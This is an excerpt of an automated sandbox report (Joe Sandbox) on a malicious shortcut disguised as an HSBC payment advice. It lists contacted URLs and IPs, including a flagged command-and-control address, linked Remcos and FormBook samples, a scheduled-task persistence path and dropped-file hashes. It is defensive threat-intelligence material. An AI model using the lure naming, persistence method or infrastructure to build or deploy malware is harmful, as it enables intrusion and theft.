http://www.typography.netD	PuttyTest777.pif, 00000003.00000002.1759661809.00000000066C2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://g.live.com/odclientsettings/Prod.C:	edb.log.4.dr	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn/cThe	PuttyTest777.pif, 00000003.00000002.1759661809.00000000066C2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	PuttyTest777.pif, 00000003.00000002.1759661809.00000000066C2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://g.live.com/odclientsettings/ProdV2	edb.log.4.dr	false	URL Reputation: safe	unknown
http://geoplugin.net/json.gp/C	PuttyTest777.pif, 00000003.00000002.1748001168.0000000003729000.00000004.00000800.00020000.00000000.sdmp, HODoCxSdp.exe, 0000000C.00000002.1787198536.0000000003869000.00000004.00000800.00020000.00000000.sdmp, HODoCxSdp.exe, 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/	powershell.exe, 00000002.00000002.1713102823.000001CC901B3000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000002.00000002.1713102823.000001CC90070000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1713102823.000001CC901B3000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.galapagosdesign.com/DPlease	PuttyTest777.pif, 00000003.00000002.1759661809.00000000066C2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fonts.com	PuttyTest777.pif, 00000003.00000002.1759661809.00000000066C2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sandoll.co.kr	PuttyTest777.pif, 00000003.00000002.1759661809.00000000066C2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.urwpp.deDPlease	PuttyTest777.pif, 00000003.00000002.1759661809.00000000066C2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	PuttyTest777.pif, 00000003.00000002.1759661809.00000000066C2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000002.00000002.1690034857.000001CC80001000.00000004.00000800.00020000.00000000.sdmp, PuttyTest777.pif, 00000003.00000002.1744085005.00000000026C1000.00000004.00000800.00020000.00000000.sdmp, HODoCxSdp.exe, 0000000C.00000002.1781886454.0000000002844000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sakkal.com	PuttyTest777.pif, 00000003.00000002.1759661809.00000000066C2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6	svchost.exe, 00000004.00000003.1690157380.0000016FF0CB2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.dr	false	URL Reputation: safe	unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000002.00000002.1713102823.000001CC90070000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1713102823.000001CC901B3000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0	PuttyTest777.pif, 00000003.00000002.1759661809.00000000066C2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com	PuttyTest777.pif, 00000003.00000002.1759661809.00000000066C2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000002.00000002.1690034857.000001CC80233000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://geoplugin.net/json.gpl	PuttyTest777.pif, 0000000B.00000002.4092646965.000000000128F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000002.00000002.1690034857.000001CC80233000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://go.micro	powershell.exe, 00000002.00000002.1690034857.000001CC80C33000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000002.00000002.1713102823.000001CC901B3000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.ver)	svchost.exe, 00000004.00000002.3309735354.0000016FF0E90000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.chiark.greenend.org.uk/~sgtatham/putty/0	powershell.exe, 00000002.00000002.1690034857.000001CC8160C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1690034857.000001CC81610000.00000004.00000800.00020000.00000000.sdmp, HODoCxSdp.exe.3.dr, PuttyTest777.pif.2.dr	false	URL Reputation: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000002.00000002.1690034857.000001CC80233000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.carterandcone.coml	PuttyTest777.pif, 00000003.00000002.1759661809.00000000066C2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	PuttyTest777.pif, 00000003.00000002.1759661809.00000000066C2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn	PuttyTest777.pif, 00000003.00000002.1759661809.00000000066C2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-user.html	PuttyTest777.pif, 00000003.00000002.1759661809.00000000066C2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96	svchost.exe, 00000004.00000003.1690157380.0000016FF0CB2000.00000004.00000800.00020000.00000000.sdmp, edb.log.4.dr	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/	PuttyTest777.pif, 00000003.00000002.1759661809.00000000066C2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	PuttyTest777.pif, 00000003.00000002.1759661809.00000000066C2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://aka.ms/pscore68	powershell.exe, 00000002.00000002.1690034857.000001CC80001000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
192.254.232.209	remisat.com.uy	United States	46606	UNIFIEDLAYER-AS-1US	false
178.237.33.50	geoplugin.net	Netherlands	8455	ATOM86-ASATOM86NL	false
204.10.160.230	unknown	Canada	64236	UNREAL-SERVERSUS	true

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1482979
Start date and time:	2024-07-26 13:02:14 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 12s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	22
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Payment Advice__HSBC Banking.pdf.lnk
Detection:	MAL
Classification:	mal100.rans.troj.spyw.evad.winLNK@27/23@2/4
EGA Information:	Successful, ratio: 60%
HCA Information:	Successful, ratio: 99% Number of executed functions: 60 Number of non-executed functions: 199
Cookbook Comments:	Found application associated with file extension: .lnk Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 184.28.90.27
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target PuttyTest777.pif, PID 7424 because there are no executed function
Execution Graph export aborted for target powershell.exe, PID 7020 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
07:03:05	API Interceptor	74x Sleep call for process: powershell.exe modified
07:03:09	API Interceptor	3x Sleep call for process: svchost.exe modified
07:03:09	API Interceptor	5186947x Sleep call for process: PuttyTest777.pif modified
07:03:14	API Interceptor	2x Sleep call for process: HODoCxSdp.exe modified
12:03:12	Task Scheduler	Run new task: HODoCxSdp path: C:\Users\user\AppData\Roaming\HODoCxSdp.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
192.254.232.209	Banco_BPM__Copia_del_Pagamento.pdf.bat	Get hash	malicious	Remcos	Browse
	Transaction reference number GLV211510801_pdf.scr.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse
	Aviz de Plata_Comert_Bank_pdf.scr.exe	Get hash	malicious	Unknown	Browse
	Aviz de Plata_Comert_Bank_pdf.scr.exe	Get hash	malicious	Unknown	Browse
	Aviso_de_Pagamento_Banco_Montepio_pdf.scr.exe	Get hash	malicious	Unknown	Browse
	Copia_de_Pago__BancoEstado__pdf.scr.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse
	Copia_de_Pago_Mibanco_Pdf.scr.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse
	Aviso_de_Pagamento_Banco_Montepio_pdf.scr.exe	Get hash	malicious	Unknown	Browse
	Transaction reference number GLV211510801.scr.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse
	BBVA__Aviso_de_Pago_pdf.pif.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
178.237.33.50	C1ZsNxSer8.exe	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	Quotation.xls	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	LisectAVT_2403002A_101.exe	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	LisectAVT_2403002A_407.exe	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	LisectAVT_2403002A_431.exe	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	IAENMAIL-A4-240717-0830-000090912_PDF.exe	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	CDG__ Copia de Pagamento.pdf.exe	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	CFS-0682-2-08 Order.exe	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	Scan_SKMBT_EPDA _ SOA_Payment Reference TR-37827392-2024-07-24.Pdf.exe	Get hash	malicious	Remcos, DBatLoader	Browse	geoplugin.net/json.gp
	remcos.exe	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
204.10.160.230	CDG__ Copia de Pagamento.pdf.exe	Get hash	malicious	Remcos	Browse
	Banco_BPM__Copia_del_Pagamento.pdf.bat	Get hash	malicious	Remcos	Browse
	BBVA Colombia__ Aviso de Pago.pdf.bat.exe	Get hash	malicious	Remcos	Browse
	Aviso de Pago __Banco Republica.pdf.bat.exe	Get hash	malicious	Remcos	Browse
	Payment Advice__Swift-MT103.pdf.bat.exe	Get hash	malicious	Remcos	Browse
	UniCredit__Avviso di Pagamento.pdf.bat.exe	Get hash	malicious	Remcos	Browse
	Documento di Pagamento_Intesa Sanpaolo_pdf.bat.exe	Get hash	malicious	Remcos	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
remisat.com.uy	Banco_BPM__Copia_del_Pagamento.pdf.bat	Get hash	malicious	Remcos	Browse	192.254.232.209
	Transaction reference number GLV211510801_pdf.scr.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	192.254.232.209
	Aviz de Plata_Comert_Bank_pdf.scr.exe	Get hash	malicious	Unknown	Browse	192.254.232.209
	Aviz de Plata_Comert_Bank_pdf.scr.exe	Get hash	malicious	Unknown	Browse	192.254.232.209
	Aviso_de_Pagamento_Banco_Montepio_pdf.scr.exe	Get hash	malicious	Unknown	Browse	192.254.232.209
	Copia_de_Pago__BancoEstado__pdf.scr.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	192.254.232.209
	Copia_de_Pago_Mibanco_Pdf.scr.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	192.254.232.209
	Aviso_de_Pagamento_Banco_Montepio_pdf.scr.exe	Get hash	malicious	Unknown	Browse	192.254.232.209
	Transaction reference number GLV211510801.scr.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	192.254.232.209
	BBVA__Aviso_de_Pago_pdf.pif.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	192.254.232.209
geoplugin.net	C1ZsNxSer8.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	Quotation.xls	Get hash	malicious	Remcos	Browse	178.237.33.50
	LisectAVT_2403002A_101.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	LisectAVT_2403002A_407.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	LisectAVT_2403002A_431.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	IAENMAIL-A4-240717-0830-000090912_PDF.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	CDG__ Copia de Pagamento.pdf.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	CFS-0682-2-08 Order.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	Scan_SKMBT_EPDA _ SOA_Payment Reference TR-37827392-2024-07-24.Pdf.exe	Get hash	malicious	Remcos, DBatLoader	Browse	178.237.33.50
	remcos.exe	Get hash	malicious	Remcos	Browse	178.237.33.50

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
UNIFIEDLAYER-AS-1US	QMe7JpPtde.exe	Get hash	malicious	Unknown	Browse	108.179.252.188
	file.exe	Get hash	malicious	SystemBC	Browse	192.185.32.157
	file.exe	Get hash	malicious	SystemBC	Browse	162.241.61.149
	https://qualitycoffee.com.au/sd/kun/Adobe.html	Get hash	malicious	Unknown	Browse	192.185.194.48
	COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Get hash	malicious	FormBook	Browse	192.185.209.182
	https://pousadaalgodaodapraia.com.br/wp-includes/Kinsh.html	Get hash	malicious	Unknown	Browse	162.241.102.156
	http://littlebighero.ch	Get hash	malicious	Unknown	Browse	162.241.224.188
	cliente.exe	Get hash	malicious	Unknown	Browse	108.179.252.188
	S982i1J0Uk.msi	Get hash	malicious	Unknown	Browse	108.179.252.188
	cliente.exe	Get hash	malicious	Unknown	Browse	108.179.252.188
ATOM86-ASATOM86NL	C1ZsNxSer8.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	Quotation.xls	Get hash	malicious	Remcos	Browse	178.237.33.50
	LisectAVT_2403002A_101.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	LisectAVT_2403002A_407.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	LisectAVT_2403002A_431.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	IAENMAIL-A4-240717-0830-000090912_PDF.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	CDG__ Copia de Pagamento.pdf.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	CFS-0682-2-08 Order.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	Scan_SKMBT_EPDA _ SOA_Payment Reference TR-37827392-2024-07-24.Pdf.exe	Get hash	malicious	Remcos, DBatLoader	Browse	178.237.33.50
	remcos.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
UNREAL-SERVERSUS	CDG__ Copia de Pagamento.pdf.exe	Get hash	malicious	Remcos	Browse	204.10.160.230
	LisectAVT_2403002C_9.exe	Get hash	malicious	Remcos	Browse	212.162.149.217
	DRAFT AWB and DRAFT Commercial invoice.xls	Get hash	malicious	Remcos	Browse	162.251.122.70
	XrAADcYten.rtf	Get hash	malicious	Remcos	Browse	162.251.122.76
	iWRmEn1DDT.rtf	Get hash	malicious	Remcos	Browse	204.10.160.144
	SecuriteInfo.com.Exploit.CVE-2017-11882.123.14325.16174.rtf	Get hash	malicious	Remcos	Browse	162.251.122.70
	Payment Copy.xls	Get hash	malicious	Remcos	Browse	204.10.160.144
	Chemicals list 0724.exe	Get hash	malicious	Remcos, GuLoader	Browse	212.162.149.85
	RFQPO3D93876738.scr.exe	Get hash	malicious	AgentTesla, RedLine, XWorm	Browse	212.162.149.48
	Banco_BPM__Copia_del_Pagamento.pdf.bat	Get hash	malicious	Remcos	Browse	204.10.160.230

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	https://rtntrack.rediff.com/click?url=___https://www.firstpost.com/health/covid-19-puts-kidney-patients-at-high-risk-as-poor-immunity-ill-equipped-dialysis-centres-exposes-patients-to-infection-8627161.html___&service=instasearch&clientip=66.249.79.152&pos=readfullarticle&Ruw=&Rl=&q=&destinationurl=https://My.ha51000.com/.de/c2FsbHkuYmVldHlAcXVpbHRlci5jb20=	Get hash	malicious	Phisher	Browse	192.254.232.209
	http://cursostop10.com.br/adm/rudd/?email=nathalie.petillon@chirec.be	Get hash	malicious	HTMLPhisher	Browse	192.254.232.209
	file.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse	192.254.232.209
	SecuriteInfo.com.Trojan.PackedNET.738.1574.9831.exe	Get hash	malicious	AgentTesla	Browse	192.254.232.209
	http://cs9.biz	Get hash	malicious	Unknown	Browse	192.254.232.209
	https://cloudflare-ipfs.com/ipfs/QmZe2ELun5aFwHyi9wE3DpfuUQM8RqExLq66jv64aV8BQd/#info@royaletruckservices.com.au	Get hash	malicious	HTMLPhisher	Browse	192.254.232.209
	new order 00041221.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	192.254.232.209
	ynhHNexysa.exe	Get hash	malicious	AgentTesla	Browse	192.254.232.209
	7Y18r(191).exe	Get hash	malicious	Unknown	Browse	192.254.232.209
	7Y18r(169).exe	Get hash	malicious	CryptOne	Browse	192.254.232.209

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.363788168458258
Encrypted:	false
SSDEEP:	6:6xPoaaD0JOCEfMuaaD0JOCEfMKQmDNOxPoaaD0JOCEfMuaaD0JOCEfMKQmDN:1aaD0JcaaD0JwQQbaaD0JcaaD0JwQQ
MD5:	0E72F896C84F1457C62C0E20338FAC0D
SHA1:	9C071CC3D15E5BD8BF603391AE447202BD9F8537
SHA-256:	686DC879EA8690C42D3D5D10D0148AE7110FA4D8DCCBF957FB8E41EE3D4A42B3
SHA-512:	AAA5BE088708DABC2EC9A7A6632BDF5700BE719D3F72B732BD2DFD1A3CFDD5C8884BFA4951DB0C499AF423EC30B14A49A30FBB831D1B0A880FE10053043A4251
Malicious:	false
Preview:	*.>...........&.....D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................................................&.............................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\edb.log

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	1.3107836595385285
Encrypted:	false
SSDEEP:	3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrD:KooCEYhgYEL0In
MD5:	65BFD62C9F2B205258DA470BADAA4E8F
SHA1:	72DE6FCA43865E095B551C08920F2CCFDF66A316
SHA-256:	B56DAC296ABA358C1D2A06D43929115C8134CFD9C4BAAB7FD75E1BC3028858A1
SHA-512:	1D739462B9C551E08924F73DDC78FDF00DC8C35EEA976DAEFA8939B9EBE4FFE8DE0B4D493DE4BC4AEDA42697AE97F8C37582FA5DAA0AF66855A825586FEE5C50
Malicious:	false
Preview:	z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0x1a25a0b6, page size 16384, Windows version 10.0
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.422173111025355
Encrypted:	false
SSDEEP:	1536:vSB2ESB2SSjlK/uedMrSU0OrsJzvqYkr3g16f2UPkLk+ku4/Iw4KKazAkUk1k2DO:vazag03A2UrzJDO
MD5:	49973C611FC7675F859E659ACC6D00CF
SHA1:	028E988E7AF4DE50DF89C219D0AF12BD742EFBCF
SHA-256:	E6C8657D7AB55F4EF986CBA2472CBC05F149C14B7A9B2DC6F0DF31AE694E9253
SHA-512:	8A108E67DF4DB9005FD49E74F9F6ECCF489C8DACDD13C4B1DE20409F7D544226E78A6465D61B21F4E19B41870A7B7465EB1D891E6C7402D6140B48A4D6905546
Malicious:	false
Preview:	.%..... .......Y.......X\...;...{......................n.%..........\|/......\|..h.#..........\|/.n.%.........D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............................................................................................................................................................................................................2...{...........................................\|/....................W.....\|/..........................#......n.%.....................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.07721181382197354
Encrypted:	false
SSDEEP:	3:0NSltOetYebZ/l1ZKBtM/6KihPjJKBtU6KBtollOE/tlnl+/rTc:0NyrzbZ/l10I/hSYghcpMP
MD5:	2CAAD6CD68EBC8B3DDD5016749A85068
SHA1:	874C729DDD2F750721F1D728FCE68F2342FBCA24
SHA-256:	7CCC2E61A7DF9C5AAC66D7F04CF1D2B7530588F99B95040661EF78CE368AFF70
SHA-512:	DD9372475A884E6ED845878F17D4AFD602FB6D1ACBD1CEA2FA570354386AA3F136008041237BA2E87DD906E43254C140D7F31613D5738FCCBC378FD1CF965856
Malicious:	false
Preview:	..r......................................;...{.......\|.......\|/..............\|/......\|/..&.b.....\|/....................W.....\|/.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\HODoCxSdp.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\HODoCxSdp.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLV1qE4jE4K5E4KlKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:Mp1qHjHK5HKlYHKh3oPtHo6hAHKze0HJ
MD5:	B3F9683FD57A94D3C3F5E1AEC259CEAD
SHA1:	EC2310112CBA894207F624FCC35E9C0FCE80EE2F
SHA-256:	97FC8E1E4A9D08C91DEC78055942F0562C6EEC2480F5DDA2E7A9E9358AC86F94
SHA-512:	37407216C4E44C3FFF758637D4661AA9CCAC1C34C9AFEDEAF4ACEFEE8F527921046004F90CD2AE304E1A0EAFB636AC7F0DDBCED579C6642E7C32746491E854F2
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PuttyTest777.pif.log

Download File

Process:	C:\Users\user\AppData\Roaming\PuttyTest777.pif
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLV1qE4jE4K5E4KlKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:Mp1qHjHK5HKlYHKh3oPtHo6hAHKze0HJ
MD5:	B3F9683FD57A94D3C3F5E1AEC259CEAD
SHA1:	EC2310112CBA894207F624FCC35E9C0FCE80EE2F
SHA-256:	97FC8E1E4A9D08C91DEC78055942F0562C6EEC2480F5DDA2E7A9E9358AC86F94
SHA-512:	37407216C4E44C3FFF758637D4661AA9CCAC1C34C9AFEDEAF4ACEFEE8F527921046004F90CD2AE304E1A0EAFB636AC7F0DDBCED579C6642E7C32746491E854F2
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\json[1].json

Download File

Process:	C:\Users\user\AppData\Roaming\PuttyTest777.pif
File Type:	JSON data
Category:	dropped
Size (bytes):	962
Entropy (8bit):	5.012309356796613
Encrypted:	false
SSDEEP:	12:tklu+mnd66GkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkwV:qlu+KdbauKyGX85jvXhNlT3/7AcV9Wro
MD5:	14B479958E659C5A4480548A393022AC
SHA1:	CD0766C1DAB80656D469ABDB22917BE668622015
SHA-256:	0F92BDD807D2F5C9947E1775A20231233043C171F62E1AFA705A7E7938909BFE
SHA-512:	4E87CA47392DD9710F9E3D4A2124A34B41938986A4F43D50A48623DB1838C0D6CFF05FD2A23792DCD5A974A94416C97DC04ECEF85025FC785F3393B69A0B1DC5
Malicious:	false
Preview:	{. "geoplugin_request":"8.46.123.33",. "geoplugin_status":200,. "geoplugin_delay":"0ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

